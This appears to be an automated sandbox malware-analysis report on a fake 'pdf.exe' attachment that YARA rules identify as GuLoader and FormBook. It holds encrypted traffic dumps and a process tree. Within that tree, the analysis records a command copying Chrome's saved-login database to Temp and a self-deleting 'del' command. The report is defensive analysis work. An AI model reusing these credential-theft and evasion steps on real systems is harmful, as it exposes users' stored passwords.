                                                                                                                                                                                                                              2022-02-21 15:54:15 UTC329INData Raw: fd 34 0c dc 6c 0a c1 0c 0c 82 62 b2 c1 7c 35 0f 07 f7 86 53 95 ad 41 ce f2 c9 6d c1 84 74 68 23 f4 fd 85 82 ce 6b 0e 47 06 ca db 82 5b dd 55 0b 81 2e 4a a0 41 7a 1a 99 ca ee 0e 70 4a d0 67 1e 0c b9 4f c6 d7 ab 90 86 ab 28 db c3 9a 08 26 06 51 a2 d7 56 80 20 b5 94 cd 93 ec da 15 30 8b fa 6e 70 a8 11 92 10 a1 26 a7 f4 e7 05 7a 36 65 6b d4 62 8c 6c 35 6f e3 9e 24 62 84 36 75 a5 6b 69 21 23 72 2a 41 e8 ab 60 9c f3 dc b5 af be 71 32 91 79 a3 6c 1f 95 9a cb e0 39 1b 3f a3 51 c3 73 8a 73 ed f7 7a 55 89 90 12 d3 b3 fe 59 77 5e 1c 50 d7 1b d9 b8 38 67 52 13 27 a3 38 ce 70 e4 20 e4 cc 7d cc 0c ea ca 08 45 f8 ed a3 5e c5 fb 87 c6 b7 5a 44 68 8b e8 cf ff cf 8b d4 a5 d0 25 8f 6c e1 b5 51 ac c5 1f 62 ed 77 b3 65 1e ed e8 d1 44 85 86 53 4f dd b0 a3 7c 4f ee d2 bd dc ab
                                                                                                                                                                                                                              Data Ascii: 4lb|5SAmth#kG[U.JAzpJgO(&QV 0np&z6ekbl5o$b6uki!#r*A`q2yl9?QsszUYw^P8gR'8p }E^ZDh%lQbweDSO|O
                                                                                                                                                                                                                              2022-02-21 15:54:15 UTC330INData Raw: 27 cb 1d eb 9b ca 13 a2 e9 b1 87 e4 10 e1 49 a2 a7 80 69 99 50 29 c4 0b 2c a4 dc 3b 90 16 f5 45 f8 c4 d1 48 b8 a3 38 88 f3 f9 13 85 b0 3c 93 82 65 35 b1 75 c7 2e b7 41 70 07 4d 53 1f 83 4a fa 13 18 c6 b8 86 01 2b 11 64 54 95 11 1e 06 c5 87 b0 47 f9 0f 3e 21 39 99 c2 4d b3 1a 32 31 56 78 40 03 51 5f 1a 7f f9 aa 61 fb 81 d2 eb 7b 9b ac be ab a2 19 98 87 95 c1 d6 b2 67 74 bf c4 d0 16 ea fe 6f 3e ff 12 db 1f 0e 27 20 b2 c8 0b 0b 3d 47 dd 7c 42 f0 4c 01 24 dd 08 46 8c 81 33 3d 4e 66 58 8a 26 dd 39 4d 00
                                                                                                                                                                                                                              Data Ascii: 'IiP),;EH8<e5u.ApMSJ+dTG>!9M21Vx@Q_a{gto>' =G|BL$F3=NfX&9M
                                                                                                                                                                                                                              2022-02-21 15:54:15 UTC330INData Raw: 92 29 20 01 f3 59 6c 26 3e ef 4c 7e c9 34 1b 6e a8 60 52 33 93 3a 90 18 43 ae aa 19 12 17 6d 17 a9 3e 2b 76 ca 59 7f d8 3e 72 e4 6e 7c 97 f5 12 f2 cb be 44 4f 96 11 f3 14 c4 e8 83 ea 0d a0 11 f4 be 75 08 1a a0 f9 0e ca 1a f6 65 4f 26 08 68 a5 ac 07 9c 79 ee e5 1c 9a 60 1c f1 2b 21 27 9c fa d6 7d a6 b8 ac 44 2d 71 b7 33 71 eb f1 2a 80 ec fd e1 4d 28 8c 14 38 77 73 bb 0d 3c b8 3a 1f 68 7c 9f 2f 3e 34 bc 27 20 b2 e3 76 f3 2e 15 53 25 ec 73 b3 7d ae 05 86 93 b9 26 95 a9 1a c7 69 7f 77 45 fd df 66 a7 04 db 3b 11 3f 08 2d cb 0f 30 51 00 e8 95 c7 00 79 46 a1 c8 7f c7 08 44 93 72 51 bb a7 e1 bc b9 7a 6f 7d b4 f3 e0 e5 29 43 2a e5 e5 e2 43 f3 55 aa e1 b9 f3 c8 d4 a8 a5 45 9b 07 2c 1b 9e cd 0f b5 e0 22 ce 21 c9 93 0c 70 70 75 dc aa ce 93 a2 af 0e 24 2b b6 53 6f 84
                                                                                                                                                                                                                              Data Ascii: ) Yl&>L~4n`R3:Cm>+vY>rn|DOueO&hy`+!'}D-q3q*M(8ws<:h|/>4' v.S%s}&iwEf;?-0QyFDrQzo})C*CUE,"!ppu$+So
                                                                                                                                                                                                                              2022-02-21 15:54:15 UTC331INData Raw: 43 42 68 c2 84 73 a5 4c a0 c5 30 7b 19 7c d3 ed c0 4f 49 2d a2 00 25 4b d3 b0 9b ba 49 02 a0 c3 08 c4 c3 73 59 1e 94 60 d0 3b 10 e3 a9 19 cd 1e 4f 2f ea be 5b 27 66 68 b2 8f 52 71 48 eb b7 65 e6 24 a4 bb d4 28 97 bb b9 74 c1 85 c8 f0 27 a5 a2 24 9c be cc 1a f0 26 1f 96 6b 34 50 15 77 27 7d 3a 85 41 54 c8 cb cd 4f b2 ed 73 84 c2 0f 56 f2 21 8b ff d2 01 56 d1 74 fe 06 9c 27 20 cb 8a bf 7b 27 b9 82 10 01 55 c7 93 cb a3 4e 6b 92 29 bd ec a9 a0 cf 44 92 1f 81 0c 6f 02 83 41 02 4a 49 74 5e b7 ab 0b 00 14 c2 5b e7 8e e2 d5 be 7a e6 8d a1 14 a8 d5 f9 82 45 c0 e0 1e 2c 6d 41 05 13 13 f3 1f 5d d1 16 94 dc df 8e 21 ca 8a d0 cb fa 27 73 9c da 75 37 20 96 91 74 8d a8 f2 09 35 bb de 9f dc aa 2d b5 96 98 0a 2c 67 46 2c 8f 65 93 cf 67 54 d2 fb e9 6d 3c a9 b0 1d fb b9 8e
                                                                                                                                                                                                                              Data Ascii: CBhsL0{|OI-%KIsY`;O/['fhRqHe$(t'$&k4Pw'}:ATOsV!Vt' {'UNk)DoAJIt^[zE,mA]!'su7 t5-,gF,egTm<
                                                                                                                                                                                                                              2022-02-21 15:54:15 UTC333INData Raw: c0 ee 47 5a fe e8 27 15 7e 75 9c 27 cf ac 6d 90 6e ea de a6 30 3e 30 0a 24 dc 90 95 ec 05 43 46 ab d0 5b a5 d3 c1 69 d4 60 88 86 eb 5c 72 56 2d 37 5e 4c 79 7b 58 c7 f2 06 24 48 80 10 d5 99 48 01 f2 c5 45 e2 b1 e5 80 90 88 b7 25 83 9f 0d 22 72 f0 48 a6 61 42 fb 79 b5 01 a1 2f 48 e2 1b e8 41 4b fe ff c7 0a eb 5b 8c c4 4a 98 8f 0d ce 3d 7c 59 c4 79 b0 62 4e 25 ac d5 1f 3d 5a fb 21 8c 79 16 b7 28 8b 84 7c 28 67 c3 07 fb 43 e9 a6 47 b7 85 cd b9 89 7f 82 83 04 fd 96 d8 75 33 f8 c5 2b 27 06 90 ac dc 56 b5 f4 56 58 7d 22 45 59 4f f2 7f 95 e1 5b 3e fe 22 b6 3f 2b 09 c0 be 8e b8 20 50 33 18 37 44 c2 d4 b3 b6 af 09 6d 8c f7 72 de 87 7b e6 9a 7b 95 05 25 6c 8d 06 c5 49 b3 95 ae 61 65 3f a0 4d d1 80 d1 4c ae e8 f0 d5 a3 f8 0e 4e e8 8d f1 df 40 e9 1c 7a 21 d9 55 a0 70
                                                                                                                                                                                                                              Data Ascii: GZ'~u'mn0>0$CF[i`\rV-7^Ly{X$HHE%"rHaBy/HAK[J=|YybN%=Z!y(|(gCGu3+'VVX}"EYO[>"?+ P37Dmr{{%lIae?MLN@z!Up
                                                                                                                                                                                                                              2022-02-21 15:54:15 UTC334INData Raw: fa f4 89 b2 85 5a b5 ed 0f eb 1d cd 6a e0 fb 44 73 60 d1 f0 8a 13 ae 92 22 17 66 d8 d0 77 c1 8b 09 a6 42 f5 e5 d6 d7 f6 88 21 1e 39 63 66 c7 d0 e4 08 1a 15 ac 9c dd 6e 38 94 94 f4 2b 1e 2b c1 83 9f d4 ae e1 13 cf 55 19 b5 1e b1 8b 60 37 7f 55 1b 50 d8 e1 34 c7 e8 43 b5 e0 2d fd f3 56 78 19 0a 82 d4 c0 00 3f d8 d8 3c 48 96 01 9a c2 9b 0b c1 67 63 ce 98 74 5a 70 83 1d 5c 66 dd e7 dc 9f 02 0f 6f 64 02 70 ae 33 f0 f3 ff 35 0a cd 09 c4 c4 06 6e d2 29 22 bf 40 d5 f3 3c 0f e6 75 21 b8 f8 7d 54 a5 42 f0 a9 db 93 ec 7e e5 7d 57 53 e7 35 bd e4 8b f7 1f 55 73 1c 32 ce cd ec 31 b4 46 6a d6 d8 f0 dc 20 d1 94 bb a4 de 2d c8 1f e5 91 0c f2 d5 53 97 00 0a f3 6e e5 32 f6 b4 9d d9 42 3a 18 70 fc eb 7c 94 f7 c7 97 dd 4a c5 8e ae 92 d9 d7 31 07 59 a3 20 99 b6 22 24 bb 63 f8
                                                                                                                                                                                                                              Data Ascii: ZjDs`"fwB!9cfn8++U`7UP4C-Vx?<HgctZp\fodp35n)"@<u!}TB~}WS5Us21Fj -Sn2B:p|J1Y "$c
                                                                                                                                                                                                                              2022-02-21 15:54:15 UTC335INData Raw: ea d5 3e be 93 5a 86 00 ef 6d 72 85 12 1a 45 31 89 71 c7 db ed 06 d2 c7 c5 a8 40 53 da 8e 62 27 95 25 dd 1e e7 1d 53 19 ee be 75 f8 12 72 8c d7 f9 cd dc eb ab 7e 4a 29 05 c1 d2 40 e0 75 99 2c 11 74 56 96 2c 53 93 2d 04 5d d2 ae 98 93 a9 aa 1e e2 2e ac c8 02 d7 bd 57 f3 ef 78 f5 2c ac 19 63 6c 1e 41 d1 04 ca ee 4d 41 5e 86 51 27 15 07 1a 4e b1 ab a1 89 47 cc 80 10 30 bf cd 62 f5 e3 8c 00 fa 36 06 24 bc 14 f9 41 2e 1f a0 ad fc 8c af 5f 2f 74 73 aa a3 3c b7 27 ce 1c 6d cd 35 8f 37 12 43 e2 92 75 d1 42 1a 2c 27 e8 77 40 1e 5e f2 16 56 73 84 6f 7e 96 51 d0 d3 f0 bb c8 98 4a 18 c3 13 7b 18 31 3c 1a b6 2a e4 af f9 0e 49 36 56 29 9e 5a 22 d1 66 51 c5 c2 67 36 53 36 d2 07 41 99 7b fc a2 96 04 8d 88 20 63 0d c7 53 56 da d5 98 0a 35 36 f2 ee 87 66 6c f0 26 7f ab d7
                                                                                                                                                                                                                              Data Ascii: >ZmrE1q@Sb'%Sur~J)@u,tV,S-].Wx,clAMA^Q'NG0b6$A._/ts<'m57CuB,'w@^Vso~QJ{1<*I6V)Z"fQg6S6A{ cSV56fl&
                                                                                                                                                                                                                              2022-02-21 15:54:15 UTC336INData Raw: 74 43 a8 e5 ae e0 54 83 63 9f a5 3a 8b 48 4a e8 ee d2 a5 22 cc 53 7b ba 42 cc dd 8e dc 4e b4 f4 cd 07 a9 05 28 3d 86 e7 b4 b9 f1 5f 53 eb 5c d4 db 58 23 65 22 0f 49 5d 6c 4e 4e 5f 86 01 5d 3e 0e 48 87 0b 28 ac e5 08 7d 91 b7 7b c9 87 cb ee eb e9 ba 46 b6 5d 59 94 14 6b 2d 63 54 33 6b 0f f6 66 ff 71 af aa 5c ba 3d da d1 fb 80 95 dc a6 03 47 90 79 7e 7a 31 f4 f4 51 c4 67 fb db 61 0a 0f 59 4d c2 6a aa e8 48 a4 c3 3f b3 8d a7 a5 b8 c2 05 87 5a 4b 8f 33 f9 ee bc 29 36 fd 20 59 e7 2e 21 01 66 ba c3 06 73 58 48 d7 dd 47 dd 31 a3 e3 82 59 fc e9 e3 43 b8 c1 74 fc bd 23 ef 4c e9 90 49 c6 dc 9a fa c7 1a 3e d4 95 72 40 19 24 1f 67 76 33 7e 3b 51 2d 13 58 92 1e 6c 3f 32 5b fd 43 8b c4 c1 7e 02 7d 33 63 1b 06 2a ba 4f fe f8 a8 55 c6 e7 b2 29 be 11 c7 ed ad d6 a6 5e cc
                                                                                                                                                                                                                              Data Ascii: tCTc:HJ"S{BN(=_S\X#e"I]lNN_]>H(}{F]Yk-cT3kfq\=Gy~z1QgaYMjH?ZK3)6 Y.!fsXHG1YCt#LI>r@$gv3~;Q-Xl?2[C~}3c*OU)^


                                                                                                                                                                                                                              Statistics

                                                                                                                                                                                                                              CPU Usage

                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                              Memory Usage

                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                                              Behavior

                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                              System Behavior

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                              Start time:16:49:48
                                                                                                                                                                                                                              Start date:21/02/2022
                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe"
                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                              File size:628784 bytes
                                                                                                                                                                                                                              MD5 hash:319860D181378BF868E4DEEDCF5FBFB6
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                                                                              Reputation:low

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                                                              Start time:16:50:03
                                                                                                                                                                                                                              Start date:21/02/2022
                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe"
                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                              File size:628784 bytes
                                                                                                                                                                                                                              MD5 hash:319860D181378BF868E4DEEDCF5FBFB6
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.2763779183.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.2763779183.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.2763779183.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.2792237612.000000001EE30000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.2792237612.000000001EE30000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.2792237612.000000001EE30000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000D.00000000.2299445190.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              Reputation:low

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:16
                                                                                                                                                                                                                              Start time:16:50:18
                                                                                                                                                                                                                              Start date:21/02/2022
                                                                                                                                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                                              Imagebase:0x7ff75e730000
                                                                                                                                                                                                                              File size:4849904 bytes
                                                                                                                                                                                                                              MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000000.2599606757.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000000.2599606757.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000000.2599606757.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000000.2534241139.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000000.2534241139.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000000.2534241139.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                              Reputation:moderate

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:21
                                                                                                                                                                                                                              Start time:16:50:47
                                                                                                                                                                                                                              Start date:21/02/2022
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\chkdsk.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\chkdsk.exe
                                                                                                                                                                                                                              Imagebase:0x970000
                                                                                                                                                                                                                              File size:23040 bytes
                                                                                                                                                                                                                              MD5 hash:B4016BEE9D8F3AD3D02DD21C3CAFB922
                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.7208295092.0000000005000000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.7208295092.0000000005000000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.7208295092.0000000005000000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.7208839040.0000000005030000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.7208839040.0000000005030000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.7208839040.0000000005030000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                              Reputation:low

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:22
                                                                                                                                                                                                                              Start time:16:50:51
                                                                                                                                                                                                                              Start date:21/02/2022
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:/c del "C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe"
                                                                                                                                                                                                                              Imagebase:0x80000
                                                                                                                                                                                                                              File size:236544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:moderate

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:23
                                                                                                                                                                                                                              Start time:16:50:53
                                                                                                                                                                                                                              Start date:21/02/2022
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff66d530000
                                                                                                                                                                                                                              File size:875008 bytes
                                                                                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:moderate

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:30
                                                                                                                                                                                                                              Start time:16:53:44
                                                                                                                                                                                                                              Start date:21/02/2022
                                                                                                                                                                                                                              Path:C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe
                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                              File size:628784 bytes
                                                                                                                                                                                                                              MD5 hash:319860D181378BF868E4DEEDCF5FBFB6
                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000001E.00000002.4676824720.0000000002B50000.00000040.00000001.00040000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                                                                              Reputation:low

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:31
                                                                                                                                                                                                                              Start time:16:53:49
                                                                                                                                                                                                                              Start date:21/02/2022
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:/c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
                                                                                                                                                                                                                              Imagebase:0x80000
                                                                                                                                                                                                                              File size:236544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:moderate

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:32
                                                                                                                                                                                                                              Start time:16:53:50
                                                                                                                                                                                                                              Start date:21/02/2022
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff66d530000
                                                                                                                                                                                                                              File size:875008 bytes
                                                                                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:moderate

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:33
                                                                                                                                                                                                                              Start time:16:53:50
                                                                                                                                                                                                                              Start date:21/02/2022
                                                                                                                                                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                                                                                                                                                                              Imagebase:0x7ff66e4a0000
                                                                                                                                                                                                                              File size:597432 bytes
                                                                                                                                                                                                                              MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:moderate

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:34
                                                                                                                                                                                                                              Start time:16:53:54
                                                                                                                                                                                                                              Start date:21/02/2022
                                                                                                                                                                                                                              Path:C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe"
                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                              File size:628784 bytes
                                                                                                                                                                                                                              MD5 hash:319860D181378BF868E4DEEDCF5FBFB6
                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:35
                                                                                                                                                                                                                              Start time:16:54:00
                                                                                                                                                                                                                              Start date:21/02/2022
                                                                                                                                                                                                                              Path:C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe
                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                              File size:628784 bytes
                                                                                                                                                                                                                              MD5 hash:319860D181378BF868E4DEEDCF5FBFB6
                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000023.00000000.4671499105.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000023.00000002.4818276566.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:36
                                                                                                                                                                                                                              Start time:16:54:02
                                                                                                                                                                                                                              Start date:21/02/2022
                                                                                                                                                                                                                              Path:C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe"
                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                              File size:628784 bytes
                                                                                                                                                                                                                              MD5 hash:319860D181378BF868E4DEEDCF5FBFB6
                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                                                              Disassembly

                                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                Execution Coverage:11.2%
                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:7.5%
                                                                                                                                                                                                                                Signature Coverage:19.1%
                                                                                                                                                                                                                                Total number of Nodes:1008
                                                                                                                                                                                                                                Total number of Limit Nodes:34
